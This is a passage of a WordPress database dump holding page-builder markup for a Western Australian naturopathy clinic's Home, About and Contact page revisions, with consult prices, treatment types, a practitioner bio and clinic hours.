Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $60\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2023-11-23 12:12:30','2023-11-23 04:12:30','',28,'https://verdenaturopathy.com.au/?p=398',0,'revision','',0),(399,1,'2023-11-23 12:13:28','2023-11-23 04:13:28','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Meet Mel.</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Mel is a mother, tea lover, avid foodie and degree-qualified naturopath. She resides amongst the trees in the Perth Hills. </span></p>\n<p><span style=\"font-family: Montserrat;\">She has always held a passion for holistic health and wellbeing since a young age. Chronic hormonal imbalances and gut issues led her to her first naturopathy appointment where she gained a newfound respect for the profession after achieving success in returning to health. </span></p>\n<p><span style=\"font-family: Montserrat;\">Mel is passionate about educating and empowering clients to achieve their health goals, working to restore balance between their mental, physical and emotional health. She has witnessed firsthand the healing power of herbs and nutrients, incorporating them into her own life as well as her client’s. Mel also runs Verde Botanicals, offering small-batch, handmade herbal remedies to keep her creative juices flowing. </span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2022/01/Screen-Shot-2022-01-21-at-12.20.02-pm.png\" title_text=\"Screen Shot 2022-01-21 at 12.20.02 pm\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#CCD4C8\" custom_padding=\"|20px||20px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_3912-scaled.jpg\" title_text=\"IMG_3912\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"RGBA(0,0,0,0)\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||-5px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\"]<p><span style=\"font-family: Montserrat;\">Mel has a keen interest in women’s health, gut health, metabolic dysfunction, autoimmunity and mental health. She keeps up to date with the latest research and findings on all things naturopathy, blending traditional knowledge with evidence-based medicine to achieve positive health outcomes. When she’s not consulting or creating, you’ll most likely find her brewing a cuppa, chasing after her three children or wandering through the forest. </span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-size: large;\"><strong><span style=\"font-family: \'Playfair Display\';\">Certifications: </span></strong></span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Health Science (Naturopathy) </span></p>\n<p><span style=\"font-family: Montserrat;\">Bachelor of Science (Biological Science) </span></p>\n<p><span style=\"font-family: Montserrat;\"><span>Accredited G.E.M.M. Practitioner - Gut Ecology and Metabolic Modulation</span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; font-weight: normal; font-size: large;\"><strong>Professional memberships</strong>: </span></p>\n<p><span style=\"font-family: Montserrat;\">Australian Natural Therapist’s Association (ANTA) - Full member</span></p>\n<ul></ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#000000\" border_style_all=\"none\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#c7d3c0\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','About','','inherit','closed','closed','','27-revision-v1','','','2023-11-23 12:13:28','2023-11-23 04:13:28','',27,'https://verdenaturopathy.com.au/?p=399',0,'revision','',0),(400,1,'2023-11-23 12:13:58','2023-11-23 04:13:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" 